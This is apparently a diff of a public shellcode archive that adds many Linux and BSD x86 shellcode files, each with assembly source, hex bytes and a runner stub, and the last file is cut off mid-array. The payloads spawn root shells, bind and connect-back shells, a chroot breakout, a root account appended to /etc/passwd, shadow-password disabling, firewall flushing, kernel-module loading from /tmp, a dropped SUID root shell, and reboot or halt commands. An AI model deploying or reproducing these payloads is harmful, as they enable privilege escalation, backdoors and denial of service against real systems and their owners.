shellcodes/bsd_x86/43645.asm Normal file
View file

@ -0,0 +1,46 @@
/*
simply execve_binsh shellcode in 28 bytes
written on nasm - my first nasm exp.
greetz2:
mig #darknet /EFnet.org
dev0id #rus-sec /EFnet.org (rootteam.void.ru)
*/
char shellcode[] =
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
"\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void
main()
{
int *ret;
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
/****************************************
nasm code is:
---------------start--------------------
BITS 32
jmp short path
main:
pop esi
xor eax,eax
mov byte [esi+7],al
push eax
push eax
push esi
mov al,59
push eax
int 0x80
;mov al,1 need ? I do not!
;push eax
;int 0x80
path:
call main
db '/bin/sh'
---------------end----------------------
compilation:
%nasm code.s -o code
****************************************/

39
shellcodes/linux_x86/13452.c
View file

@ -1,41 +1,36 @@
/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
/* The chroot() shellcode. It is the one of the smallest shellcodes
in the !!world!!
it will put '../' 10 times
Size 34 bytes
OS *BSD
/rootteam/dev0id (www.sysworld.net)
Size 28 bytes
OS Linux
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
main:
xor ecx,ecx
xor eax,eax
push eax
mov al,0x17
push eax
int 0x80
push ecx
mov cl,0x1e
mov cl,30
main_push:
push byte 0x2e
loop main_push
mov cl,0x1e
main_loop:
mov cl,30
main_inc:
dec cl
inc byte [esp+ecx]
dec cl
loop main_loop
push esp
mov al,0x3d
push eax
loop main_inc
mov ebx,esp
mov al,61
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
"\x3d\x50\xcd\x80";
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9"
"\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3\xb0\x3d\xcd\x80";
int
main(void)
{
@ -43,5 +38,3 @@ main(void)
ret = (int*)&ret + 2;
(*ret) = shellcode;
}
// milw0rm.com [2004-09-12]

0
shellcodes/linux_x86-64/13670.c → shellcodes/linux_x86/13670.c
View file

0
shellcodes/linux/14234.c → shellcodes/linux_x86/14234.c
View file

0
shellcodes/linux/14276.c → shellcodes/linux_x86/14276.c
View file

9
shellcodes/linux_x86/43626.c Normal file
View file

@ -0,0 +1,9 @@
unsigned char scode[] =
"\x29\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd"
"\x96\x34\xe4\x83\xeb\xfc\xe2\xf4\xcc\x5f\xbd\x2f\x97\xd0\x6c\x29"
"\x7d\xfc\x31\xbc\xcc\x5f\x65\x8c\x8e\xe5\x43\x80\x95\xb9\x1b\x94"
"\x9c\xfe\x1b\x81\x89\xf5\xbd\x07\xbc\x23\x30\x29\x7d\x05\xdc\xc6"
"\xfd\x96\x34\x90\xcd\xa6\x46\xde\xbc\xd7\x6d\xaf\xaa\xc0\x5e\xb6"
"\xb1\xa0\x5e\x8f\xb4\xac\x04\xde\xcd\xac\x0e\xcb\xc7\xb9\x56\x8d"
"\x93\xb9\x47\x8c\xf7\xcf\xbf\xb5\x01\xfc\x30\xbc\x30\x16\x5e\xe5"
"\xa5\x5b\xb4\xe4";

48
shellcodes/linux_x86/43630.c Normal file
View file

@ -0,0 +1,48 @@
/* The shellcode sets uid == 0 and loads the kernel module from /tmp/o.o
size = 67 bytes
OS = Linux i386
written by /rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
xor ebx,ebx
mov al,23
int 0x80
mov byte [esi+12],al
mov byte [esi+21],al
mov long [esi+22],esi
lea ebx,[esi+13]
mov long [esi+26],ebx
mov long [esi+30],eax
mov al,0x0b
mov ebx,esi
lea ecx,[esi+22]
lea edx,[esi+30]
int 0x80
callme:
call main
db '/sbin/insmod#/tmp/o.o'
*/
char shellcode[] =
"\xeb\x27\x5e\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x88\x46\x0c\x88"
"\x46\x15\x89\x76\x16\x8d\x5e\x0d\x89\x5e\x1a\x89\x46\x1e\xb0"
"\x0b\x89\xf3\x8d\x4e\x16\x8d\x56\x1e\xcd\x80\xe8\xd4\xff\xff"
"\xff\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x73\x6d\x6f\x64\x23\x2f"
"\x74\x6d\x70\x2f\x6f\x2e\x6f";
int
main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

50
shellcodes/linux_x86/43631.c Normal file
View file

@ -0,0 +1,50 @@
/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
in the !!world!!
it will put '../' 10 times
Size 34 bytes
OS Linux
/rootteam/dev0id (rootteam.void.ru)
dev0id@uncompiled.com
BITS 32
main:
xor ecx,ecx
xor eax,eax
xor ebx,ebx
mov al,23
int 0x80
push ecx
mov cl,30
main_push:
push byte 0x2e
loop main_push
mov cl,30
main_inc:
dec cl
inc byte [esp+ecx]
dec cl
loop main_inc
mov ebx,esp
mov al,61
int 0x80
*/
char shellcode[] =
"\x31\xc9\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x51\xb1\x1e\x6a\x2e"
"\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3"
"\xb0\x3d\xcd\x80";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}

52
shellcodes/linux_x86/43637.c Normal file
View file

@ -0,0 +1,52 @@
/* The shellcode flushs the iptables by running /sbin/iptables -F
then exit()
greetz to zilion: man, my code is shorter!
size = 64 bytes
OS = Linux i386
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+14],al
mov byte [esi+17],al
mov long [esi+18],esi
lea ebx,[esi+15]
mov long [esi+22],ebx
mov long [esi+26],eax
mov al,0x0b
mov ebx,esi
lea ecx,[esi+18]
lea edx,[esi+26]
int 0x80
mov al,0x01
xor ebx,ebx
int 0x80
callme:
call main
db '/sbin/iptables#-F#'
*/
char shellcode[] =
"\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
"\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73"
"\x23\x2d\x46\x23";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

52
shellcodes/linux_x86/43638.c Normal file
View file

@ -0,0 +1,52 @@
/* The shellcode flushs the ipchains table by running /sbin/ipchains -F
then exit()
greetz to zilion: man, my code is shorter!
size = 64 bytes
OS = Linux i386
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+14],al
mov byte [esi+17],al
mov long [esi+18],esi
lea ebx,[esi+15]
mov long [esi+22],ebx
mov long [esi+26],eax
mov al,0x0b
mov ebx,esi
lea ecx,[esi+18]
lea edx,[esi+26]
int 0x80
mov al,0x01
xor ebx,ebx
int 0x80
callme:
call main
db '/sbin/ipchains#-F#'
*/
char shellcode[] =
"\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
"\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x63\x68\x61\x69\x6e\x73"
"\x23\x2d\x46\x23";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

47
shellcodes/linux_x86/43639.c Normal file
View file

@ -0,0 +1,47 @@
/* The shellcode flushs the ipchains table by running /sbin/ipchains -F
no exit()
greetz to zilion: man, my code is shorter!
size = 58 bytes
OS = Linux i386
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+14],al
mov byte [esi+17],al
mov long [esi+18],esi
lea ebx,[esi+15]
mov long [esi+22],ebx
mov long [esi+26],eax
mov al,0x0b
mov ebx,esi
lea ecx,[esi+18]
lea edx,[esi+26]
int 0x80
callme:
call main
db '/sbin/ipchains#-F#'
;*/
char shellcode[] =
"\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
"\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
"\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
"\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x23\x2d\x46\x23";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

59
shellcodes/linux_x86/43641.c Normal file
View file

@ -0,0 +1,59 @@
/*The shellcode calls the symlink() and makes the
link to the /bin/sh in the current dir.
size = 36 bytes
OS = Linux i386
written by /rootteam/dev0id (rootteam.void.ru)
BITS 32
jmp short callit
doit:
pop esi
xor eax,eax
mov byte [esi+7],al
mov byte [esi+10],al
mov byte al,83
lea ebx,[esi]
lea ecx,[esi+8]
int 0x80
callit:
call doit
db '/bin/sh#sh#'
*/
char shellcode[]=
"\xEB\x12"
"\x5E"
"\x31\xC0"
"\x88\x46\x07"
"\x88\x46\x0A"
"\xB0\x53"
"\x8D\x1E\x8D\x4E"
"\x08\xCD"
"\x80\xE8\xE9"
"\xFF"
"\xFF"
"\xFF\x2F"
"\x62\x69\x6E"
"\x2F"
"\x73\x68"
"\x23\x73\x68"
"\x23";
int
main (void)
{
void (*code)(void);
code=(void(*)())shellcode;
(void)code();
return 0;
}

56
shellcodes/linux_x86/43643.c Normal file
View file

@ -0,0 +1,56 @@
/*************************************************************
This shellcode writes to /etc/passwd the string for the user
with uid&gid == 0;
written by dev0id dev0id@mail.ru (rootteam.void.ru)
#rus-sec /Efnet.org
greetz:
nerf
w00w00
*************************************************************
BITS 32
jmp short path
main:
pop esi
xor eax,eax
push eax
mov byte [esi+11],al
mov al,0x0a
push eax
push esi
mov al,5
push eax
int 0x80
mov edx,eax
push long 0x0a206873
push long 0x2f6e6962
push long 0x2f3a2f3a
push long 0x313a303a
push long 0x303a3a31
mov ebx,esp
mov al,20
push eax
push ebx
push edx
mov al,4
push eax
int 0x80
mov al,1
push eax
int 0x80
path:
call main
db "/etc/passwd#"
********************************************************************/
char shellcode[] =
"\xeb\x3c\x5e\x31\xc0\x50\x88\x46\x0b\xb0\x0a\x50\x56\xb0\x05"
"\x50\xcd\x80\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f"
"\x68\x3a\x2f\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30"
"\x89\xe3\xb0\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50"
"\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x23";

88
shellcodes/linux_x86/43646.c Normal file
View file

@ -0,0 +1,88 @@
/*
Connecting shellcode written by lamagra <lamagra@digibel.org>
http://lamagra.seKure.de
May 2000
.file "connect"
.version "01.01"
.text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0-1-2)
xorl %ecx,%ecx
movb $63,%eax # 63 = dup2()
int $0x80
incl %ecx
cmpl $3,%ecx
jne -0xa
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
#define NAME "connecting"
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\xc7\x45\xf0"
"\x7f\x01\x01\x01\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03"
"\x75\xf6\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45\x0c"
"\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff"
"\xff/bin/sh";
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
(int)(*funct)();
}

96
shellcodes/linux_x86/43647.c Normal file
View file

@ -0,0 +1,96 @@
/*
jmp call_w00w00
w00w00:
popl %edi
jmp w0w0w
call_w00w00:
call w00w00
w0w0w:
# OPEN
# ecx=flag (O_RDONLY, O_WRONLY, ...)
# O_WRONLY | O_APPEND | O_CREAT = 0x441
# edx=file mode
# ebx=address of filename
# eax=0x05 syscall number
xorl %ebx,%ebx
movb $(file-w0w0w),%bl
addl %edi,%ebx
xorb %al,%al
movb %al,11(%ebx)
xorl %ecx,%ecx
movw $0x441,%cx
xorl %edx,%edx
movw $00644,%dx
xorl %eax,%eax
movb $0x5,%al
int $0x80
movl %eax,%ebx # save file descriptor to %ebx (for write)
# WRITE
# ecx=address of buffer to write
# edx=number of bytes to write
# ebx=file descriptor
# eax=0x04
xorl %ecx,%ecx
movb $(string-w0w0w),%cl
addl %edi,%ecx
xorl %edx,%edx
movb $31,%dl
xorl %eax,%eax
movb $0x04,%al
int $0x80
xorl %eax,%eax
movb $1,%al
int $0x80
file:
.ascii "/etc/passwd"
endfile:
.byte 1
string:
.ascii "w00w00::0:0:w0w0w!:/:/bin/sh\n"
*/
/*
* Source to this is pass.s
* This will append a root line to the passwd file (see the source).
*
* Shok (Matt Conover), shok@dataforce.net
*/
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
"\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4"
"\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31"
"\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
"\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x77\x30\x30\x77\x30"
"\x30\x3a\x3a\x30\x3a\x30\x3a\x77\x30\x77\x30\x77\x21\x3a\x2f\x3a"
"\x2f\x62\x69\x6e\x2f\x73\x68\x0a";
void main()
{
int *ret;
printf("w00w00!\n");
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}

32
shellcodes/linux_x86/43648.c Normal file
View file

@ -0,0 +1,32 @@
#include <stdio.h>
const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena con un 0
"\x68\x63\x6f\x6e\x76" //push dword "conv"
"\x68\x70\x77\x75\x6e" //push dword "pwun"
"\x68\x62\x69\x6e\x2f" //push dword "bin/"
"\x68\x73\x72\x2f\x73" //push dword "sr/s"
"\x68\x2f\x2f\x2f\x75" //push dword "///u"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h
void main()
{
printf("\n~ This shellcode disables shadowing on a linux system ~"
"\n\n\t ~ Coded by vlan7 ~"
"\n\t ~ http://vlan7.blogspot.com ~"
"\n\n ~ Date: 4/Jul/2009"
"\n\tYou'll have the passwords stored in /etc/passwd."
"\n\tFor undo purposes use the pwconv command."
"\n\t ~ Cheers go to: Wadalbertia"
"\n\t ~ Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);
(*(void (*)()) sc)();
}

28
shellcodes/linux_x86/43649.c Normal file
View file

@ -0,0 +1,28 @@
#include <stdio.h>
const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER tha push/pop
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena //bin/sh con un 0
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h
int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "
"WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by vlan7"
"\n\t + vlan7[at]bigfoot.com"
"\n\t + http://vlan7.blogspot.com"
"\n\n[+] Date: 4/Jul/2009"
"\n[+] Thanks to: sch3m4. He initiated the funny game."
"\n\n[+] Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);
(*(void (*)()) sc)();
return 0;
}

17
shellcodes/linux_x86/43650.c Normal file
View file

@ -0,0 +1,17 @@
#include <stdio.h>
const char shellcode[]=
"\x40" // inc %eax
// "\x43" // inc %ebx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Yet conditional (%eax==0) Linux/x86 exit(0) 3 bytes or
exit(1) 4 bytes"
"\n[+] Date: 18/06/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

27
shellcodes/linux_x86/43651.c Normal file
View file

@ -0,0 +1,27 @@
#include <stdio.h>
const char shellcode[]=
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx,%ebx
"\xcd\x80" // int $0x80
"\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able
to do the setuid(0). If you don't want this you can write "\x6a\x0b\x58"
instead of "\xb0\x0b", but the shellcode will be 1 byte longer
"\x99" // cltd
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Linux/x86 setuid(0) & execve(/bin/sh,0)"
"\n[+] Date: 23/06/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

34
shellcodes/linux_x86/43652.c Normal file
View file

@ -0,0 +1,34 @@
#include <stdio.h>
const char shellcode[]=
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx,%ebx
"\xcd\x80" // int $0x80
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
"\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able to
do the setuid(0). If you don't want this you can write "\x6a\x0b\x58"
instead of "\xb0\x0b", but the shellcode will be 1 byte longer
"\x99" // cltd
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Linux/x86 setuid(0), setgid(0) &
execve(/bin/sh,[/bin/sh,NULL])"
"\n[+] Date: 23/06/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

28
shellcodes/linux_x86/43653.c Normal file
View file

@ -0,0 +1,28 @@
#include <stdio.h>
const char shellcode[]=
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x64\x6f\x77\x6e" // push $0x6e776f64
"\x68\x73\x68\x75\x74" // push $0x74756873
"\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69
"\x68\x2f\x2f\x73\x62" // push $0x62732f2f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x6a\x30" // push $0x30
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Linux/x86 execve(/sbin/shutdown,/sbin/shutdown 0)"
"\n[+] Date: 11/07/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

25
shellcodes/linux_x86/43654.c Normal file
View file

@ -0,0 +1,25 @@
#include <stdio.h>
const char shellcode[]=
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x62\x6f\x6f\x74" // push $0x746f6f62
"\x68\x6e\x2f\x72\x65" // push $0x65722f6e
"\x68\x2f\x73\x62\x69" // push $0x6962732f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Linux/x86 execve(/sbin/reboot,/sbin/reboot)"
"\n[+] Date: 11/07/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

25
shellcodes/linux_x86/43655.c Normal file
View file

@ -0,0 +1,25 @@
#include <stdio.h>
const char shellcode[]=
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x66\x68\x6c\x74" // pushw $0x746c
"\x68\x6e\x2f\x68\x61" // push $0x61682f6e
"\x68\x2f\x73\x62\x69" // push $0x6962732f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80"; // int $0x80
int main()
{
printf ("\n[+] Linux/x86 execve(/sbin/halt,/sbin/halt)"
"\n[+] Date: 11/07/2009"
"\n[+] Author: TheWorm"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}

66
shellcodes/linux_x86/43656.c Normal file
View file

@ -0,0 +1,66 @@
/*
* (linux/x86) portbind /bin/sh (port 64713)
* 83 bytes
*
* http://www.gonullyourself.org
* sToRm <hixmostorm@hotmail.com>
*/
char shellcode[] =
// <_start>:
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x31\xdb" // xor %ebx,%ebx
"\x53" // push %ebx
"\x43" // inc %ebx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx,%edx
"\x52" // push %edx
"\x68\xff\x02\xfc\xc9" // push $0xc9fc02ff
"\x89\xe1" // mov %esp,%ecx
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\x89\xc6" // mov %eax,%esi
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\xb0\x66" // mov $0x66,%al
"\x43" // inc %ebx
"\x43" // inc %ebx
"\xcd\x80" // int $0x80
"\x50" // push %eax
"\x56" // push %esi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
"\x6a\x03" // push $0x3
"\x59" // pop %ecx
// <fruity_loops>:
"\x49" // dec %ecx
"\x6a\x3f" // push $0x3f
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x75\xf8" // jne <fruity_loops>
"\xf7\xe1" // mul %ecx
"\x51" // push %ecx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
;
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

35
shellcodes/linux_x86/43657.c Normal file
View file

@ -0,0 +1,35 @@
/*
* (linux/x86) setuid(0) & execve("/bin/sh",0,0)
* 28 bytes
*
* http://www.gonullyourself.org
* sToRm <hixmostorm@hotmail.com>
*
* I made this, because http://www.milw0rm.com/shellcode/7115 felt the need
* to express his "superior" 28-byte shellcode in all caps. I wasn't able
* to beat his code, but it's no longer special.
*/
char shellcode[] =
// <_start>:
"\x31\xdb" // xor %ebx,%ebx
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\xf7\xe3" // mul %ebx
"\xb0\x0b" // mov $0xb,%al
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
;
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

27
shellcodes/linux_x86/43658.c Normal file
View file

@ -0,0 +1,27 @@
/*
* (linux/x86) execve("/bin/sh",0,0)
* 21 bytes
*
* http://www.gonullyourself.org
* sToRm <hixmostorm@hotmail.com>
*/
char shellcode[] =
// <_start>
"\x31\xc9" // xor %ecx,%ecx
"\xf7\xe1" // mul %ecx
"\x51" // push %ecx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
;
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

67
shellcodes/linux_x86/43660.c Normal file
View file

@ -0,0 +1,67 @@
/*
linux/x86 (shamelessly ripped from one of my unpublished exploits)
*/
/*
fork()'s, does setreuid(0, 0); then execve()'s:
/bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh"
hence dropping a SUID root shell in /tmp.
*/
char shellc[] =
/* Shellcode to drop a SUID root shell in /tmp/sh.
Forgive the Intel syntax in the commenting, bored with AT&T syntax..
*/
/* main: if (fork()) goto exeunt; else goto carryon; */
"\x29\xc0" /* sub ax, ax */
"\xb0\x02" /* mov al, 2 */
"\xcd\x80" /* int 0x80 */
"\x85\xc0" /* test ax, ax */
"\x75\x02" /* jnz exeunt */
"\xeb\x05" /* jmp carryon */
/* exeunt: exit(x); */
"\x29\xc0" /* sub ax, ax */
"\x40" /* inc ax */
"\xcd\x80" /* int 0x80 */
/* carryon: setreuid(0, 0); goto callz; */
"\x29\xc0" /* sub ax, ax */
"\x29\xdb" /* sub bx, bx */
"\x29\xc9" /* sub cx, cx */
"\xb0\x46" /* mov al, 0x46 */
"\xcd\x80" /* int 0x80 */
"\xeb\x2a" /* jmp callz */
/* start: execve() */
"\x5e" /* pop si */
"\x89\x76\x32" /* mov [bp+0x32], si */
"\x8d\x5e\x08" /* lea bx, [bp+0x08] */
"\x89\x5e\x36" /* mov [bp+0x36], bx */
"\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */
"\x89\x5e\x3a" /* mov [bp+0x3a], bx */
"\x29\xc0" /* sub ax, ax */
"\x88\x46\x07" /* mov [bp+0x07], al */
"\x88\x46\x0a" /* mov [bp+0x0a], al */
"\x88\x46\x31" /* mov [bp+0x31], al */
"\x89\x46\x3e" /* mov [bp+0x3e], ax */
"\x87\xf3" /* xchg si, bx */
